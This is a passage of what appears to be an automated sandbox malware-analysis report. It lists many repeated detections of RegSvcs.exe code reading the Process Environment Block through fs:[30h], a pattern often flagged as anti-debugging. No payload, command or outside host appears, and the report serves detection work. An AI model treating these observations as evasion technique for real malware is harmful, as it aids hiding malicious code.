                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9A2C3 mov eax, dword ptr fs:[00000030h]8_2_00F9A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9A2C3 mov eax, dword ptr fs:[00000030h]8_2_00F9A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012349 mov eax, dword ptr fs:[00000030h]8_2_01012349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012349 mov eax, dword ptr fs:[00000030h]8_2_01012349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012349 mov eax, dword ptr fs:[00000030h]8_2_01012349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012349 mov eax, dword ptr fs:[00000030h]8_2_01012349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012349 mov eax, dword ptr fs:[00000030h]8_2_01012349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012349 mov eax, dword ptr fs:[00000030h]8_2_01012349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012349 mov eax, dword ptr fs:[00000030h]8_2_01012349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012349 mov eax, dword ptr fs:[00000030h]8_2_01012349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012349 mov eax, dword ptr fs:[00000030h]8_2_01012349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012349 mov eax, dword ptr fs:[00000030h]8_2_01012349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012349 mov eax, dword ptr fs:[00000030h]8_2_01012349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012349 mov eax, dword ptr fs:[00000030h]8_2_01012349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012349 mov eax, dword ptr fs:[00000030h]8_2_01012349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012349 mov eax, dword ptr fs:[00000030h]8_2_01012349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01012349 mov eax, dword ptr fs:[00000030h]8_2_01012349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0106634F mov eax, dword ptr fs:[00000030h]8_2_0106634F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01038350 mov ecx, dword ptr fs:[00000030h]8_2_01038350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0105A352 mov eax, dword ptr fs:[00000030h]8_2_0105A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA02A0 mov eax, dword ptr fs:[00000030h]8_2_00FA02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA02A0 mov eax, dword ptr fs:[00000030h]8_2_00FA02A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101035C mov eax, dword ptr fs:[00000030h]8_2_0101035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101035C mov eax, dword ptr fs:[00000030h]8_2_0101035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101035C mov eax, dword ptr fs:[00000030h]8_2_0101035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101035C mov ecx, dword ptr fs:[00000030h]8_2_0101035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101035C mov eax, dword ptr fs:[00000030h]8_2_0101035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101035C mov eax, dword ptr fs:[00000030h]8_2_0101035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCE284 mov eax, dword ptr fs:[00000030h]8_2_00FCE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCE284 mov eax, dword ptr fs:[00000030h]8_2_00FCE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103437C mov eax, dword ptr fs:[00000030h]8_2_0103437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8826B mov eax, dword ptr fs:[00000030h]8_2_00F8826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F94260 mov eax, dword ptr fs:[00000030h]8_2_00F94260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F94260 mov eax, dword ptr fs:[00000030h]8_2_00F94260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F94260 mov eax, dword ptr fs:[00000030h]8_2_00F94260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F96259 mov eax, dword ptr fs:[00000030h]8_2_00F96259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8A250 mov eax, dword ptr fs:[00000030h]8_2_00F8A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010163C0 mov eax, dword ptr fs:[00000030h]8_2_010163C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8823B mov eax, dword ptr fs:[00000030h]8_2_00F8823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0104C3CD mov eax, dword ptr fs:[00000030h]8_2_0104C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010343D4 mov eax, dword ptr fs:[00000030h]8_2_010343D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010343D4 mov eax, dword ptr fs:[00000030h]8_2_010343D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103E3DB mov eax, dword ptr fs:[00000030h]8_2_0103E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103E3DB mov eax, dword ptr fs:[00000030h]8_2_0103E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103E3DB mov ecx, dword ptr fs:[00000030h]8_2_0103E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103E3DB mov eax, dword ptr fs:[00000030h]8_2_0103E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC63FF mov eax, dword ptr fs:[00000030h]8_2_00FC63FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE3F0 mov eax, dword ptr fs:[00000030h]8_2_00FAE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE3F0 mov eax, dword ptr fs:[00000030h]8_2_00FAE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE3F0 mov eax, dword ptr fs:[00000030h]8_2_00FAE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA03E9 mov eax, dword ptr fs:[00000030h]8_2_00FA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA03E9 mov eax, dword ptr fs:[00000030h]8_2_00FA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA03E9 mov eax, dword ptr fs:[00000030h]8_2_00FA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA03E9 mov eax, dword ptr fs:[00000030h]8_2_00FA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA03E9 mov eax, dword ptr fs:[00000030h]8_2_00FA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA03E9 mov eax, dword ptr fs:[00000030h]8_2_00FA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA03E9 mov eax, dword ptr fs:[00000030h]8_2_00FA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA03E9 mov eax, dword ptr fs:[00000030h]8_2_00FA03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F983C0 mov eax, dword ptr fs:[00000030h]8_2_00F983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F983C0 mov eax, dword ptr fs:[00000030h]8_2_00F983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F983C0 mov eax, dword ptr fs:[00000030h]8_2_00F983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F983C0 mov eax, dword ptr fs:[00000030h]8_2_00F983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9A3C0 mov eax, dword ptr fs:[00000030h]8_2_00F9A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9A3C0 mov eax, dword ptr fs:[00000030h]8_2_00F9A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9A3C0 mov eax, dword ptr fs:[00000030h]8_2_00F9A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9A3C0 mov eax, dword ptr fs:[00000030h]8_2_00F9A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9A3C0 mov eax, dword ptr fs:[00000030h]8_2_00F9A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9A3C0 mov eax, dword ptr fs:[00000030h]8_2_00F9A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01018243 mov eax, dword ptr fs:[00000030h]8_2_01018243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01018243 mov ecx, dword ptr fs:[00000030h]8_2_01018243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0104A250 mov eax, dword ptr fs:[00000030h]8_2_0104A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0104A250 mov eax, dword ptr fs:[00000030h]8_2_0104A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0106625D mov eax, dword ptr fs:[00000030h]8_2_0106625D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F88397 mov eax, dword ptr fs:[00000030h]8_2_00F88397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F88397 mov eax, dword ptr fs:[00000030h]8_2_00F88397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F88397 mov eax, dword ptr fs:[00000030h]8_2_00F88397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01040274 mov eax, dword ptr fs:[00000030h]8_2_01040274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01040274 mov eax, dword ptr fs:[00000030h]8_2_01040274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01040274 mov eax, dword ptr fs:[00000030h]8_2_01040274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01040274 mov eax, dword ptr fs:[00000030h]8_2_01040274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01040274 mov eax, dword ptr fs:[00000030h]8_2_01040274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01040274 mov eax, dword ptr fs:[00000030h]8_2_01040274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01040274 mov eax, dword ptr fs:[00000030h]8_2_01040274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01040274 mov eax, dword ptr fs:[00000030h]8_2_01040274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01040274 mov eax, dword ptr fs:[00000030h]8_2_01040274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01040274 mov eax, dword ptr fs:[00000030h]8_2_01040274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01040274 mov eax, dword ptr fs:[00000030h]8_2_01040274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01040274 mov eax, dword ptr fs:[00000030h]8_2_01040274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8E388 mov eax, dword ptr fs:[00000030h]8_2_00F8E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8E388 mov eax, dword ptr fs:[00000030h]8_2_00F8E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8E388 mov eax, dword ptr fs:[00000030h]8_2_00F8E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB438F mov eax, dword ptr fs:[00000030h]8_2_00FB438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB438F mov eax, dword ptr fs:[00000030h]8_2_00FB438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01010283 mov eax, dword ptr fs:[00000030h]8_2_01010283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01010283 mov eax, dword ptr fs:[00000030h]8_2_01010283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01010283 mov eax, dword ptr fs:[00000030h]8_2_01010283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010262A0 mov eax, dword ptr fs:[00000030h]8_2_010262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010262A0 mov ecx, dword ptr fs:[00000030h]8_2_010262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010262A0 mov eax, dword ptr fs:[00000030h]8_2_010262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010262A0 mov eax, dword ptr fs:[00000030h]8_2_010262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010262A0 mov eax, dword ptr fs:[00000030h]8_2_010262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010262A0 mov eax, dword ptr fs:[00000030h]8_2_010262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010662D6 mov eax, dword ptr fs:[00000030h]8_2_010662D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8C310 mov ecx, dword ptr fs:[00000030h]8_2_00F8C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB0310 mov ecx, dword ptr fs:[00000030h]8_2_00FB0310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCA30B mov eax, dword ptr fs:[00000030h]8_2_00FCA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCA30B mov eax, dword ptr fs:[00000030h]8_2_00FCA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCA30B mov eax, dword ptr fs:[00000030h]8_2_00FCA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01026500 mov eax, dword ptr fs:[00000030h]8_2_01026500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01064500 mov eax, dword ptr fs:[00000030h]8_2_01064500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01064500 mov eax, dword ptr fs:[00000030h]8_2_01064500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01064500 mov eax, dword ptr fs:[00000030h]8_2_01064500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01064500 mov eax, dword ptr fs:[00000030h]8_2_01064500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01064500 mov eax, dword ptr fs:[00000030h]8_2_01064500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01064500 mov eax, dword ptr fs:[00000030h]8_2_01064500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01064500 mov eax, dword ptr fs:[00000030h]8_2_01064500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F904E5 mov ecx, dword ptr fs:[00000030h]8_2_00F904E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC44B0 mov ecx, dword ptr fs:[00000030h]8_2_00FC44B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F964AB mov eax, dword ptr fs:[00000030h]8_2_00F964AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBA470 mov eax, dword ptr fs:[00000030h]8_2_00FBA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBA470 mov eax, dword ptr fs:[00000030h]8_2_00FBA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBA470 mov eax, dword ptr fs:[00000030h]8_2_00FBA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB245A mov eax, dword ptr fs:[00000030h]8_2_00FB245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8645D mov eax, dword ptr fs:[00000030h]8_2_00F8645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010105A7 mov eax, dword ptr fs:[00000030h]8_2_010105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010105A7 mov eax, dword ptr fs:[00000030h]8_2_010105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010105A7 mov eax, dword ptr fs:[00000030h]8_2_010105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCE443 mov eax, dword ptr fs:[00000030h]8_2_00FCE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCE443 mov eax, dword ptr fs:[00000030h]8_2_00FCE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCE443 mov eax, dword ptr fs:[00000030h]8_2_00FCE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCE443 mov eax, dword ptr fs:[00000030h]8_2_00FCE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCE443 mov eax, dword ptr fs:[00000030h]8_2_00FCE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCE443 mov eax, dword ptr fs:[00000030h]8_2_00FCE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCE443 mov eax, dword ptr fs:[00000030h]8_2_00FCE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCE443 mov eax, dword ptr fs:[00000030h]8_2_00FCE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCA430 mov eax, dword ptr fs:[00000030h]8_2_00FCA430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8E420 mov eax, dword ptr fs:[00000030h]8_2_00F8E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8E420 mov eax, dword ptr fs:[00000030h]8_2_00F8E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8E420 mov eax, dword ptr fs:[00000030h]8_2_00F8E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8C427 mov eax, dword ptr fs:[00000030h]8_2_00F8C427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC8402 mov eax, dword ptr fs:[00000030h]8_2_00FC8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC8402 mov eax, dword ptr fs:[00000030h]8_2_00FC8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC8402 mov eax, dword ptr fs:[00000030h]8_2_00FC8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCC5ED mov eax, dword ptr fs:[00000030h]8_2_00FCC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCC5ED mov eax, dword ptr fs:[00000030h]8_2_00FCC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F925E0 mov eax, dword ptr fs:[00000030h]8_2_00F925E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]8_2_00FBE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]8_2_00FBE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]8_2_00FBE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]8_2_00FBE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]8_2_00FBE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]8_2_00FBE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]8_2_00FBE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]8_2_00FBE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01016420 mov eax, dword ptr fs:[00000030h]8_2_01016420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01016420 mov eax, dword ptr fs:[00000030h]8_2_01016420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01016420 mov eax, dword ptr fs:[00000030h]8_2_01016420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01016420 mov eax, dword ptr fs:[00000030h]8_2_01016420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01016420 mov eax, dword ptr fs:[00000030h]8_2_01016420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01016420 mov eax, dword ptr fs:[00000030h]8_2_01016420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01016420 mov eax, dword ptr fs:[00000030h]8_2_01016420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F965D0 mov eax, dword ptr fs:[00000030h]8_2_00F965D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCA5D0 mov eax, dword ptr fs:[00000030h]8_2_00FCA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCA5D0 mov eax, dword ptr fs:[00000030h]8_2_00FCA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCE5CF mov eax, dword ptr fs:[00000030h]8_2_00FCE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCE5CF mov eax, dword ptr fs:[00000030h]8_2_00FCE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB45B1 mov eax, dword ptr fs:[00000030h]8_2_00FB45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB45B1 mov eax, dword ptr fs:[00000030h]8_2_00FB45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0104A456 mov eax, dword ptr fs:[00000030h]8_2_0104A456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCE59C mov eax, dword ptr fs:[00000030h]8_2_00FCE59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101C460 mov ecx, dword ptr fs:[00000030h]8_2_0101C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC4588 mov eax, dword ptr fs:[00000030h]8_2_00FC4588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F92582 mov eax, dword ptr fs:[00000030h]8_2_00F92582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F92582 mov ecx, dword ptr fs:[00000030h]8_2_00F92582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC656A mov eax, dword ptr fs:[00000030h]8_2_00FC656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC656A mov eax, dword ptr fs:[00000030h]8_2_00FC656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC656A mov eax, dword ptr fs:[00000030h]8_2_00FC656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0104A49A mov eax, dword ptr fs:[00000030h]8_2_0104A49A
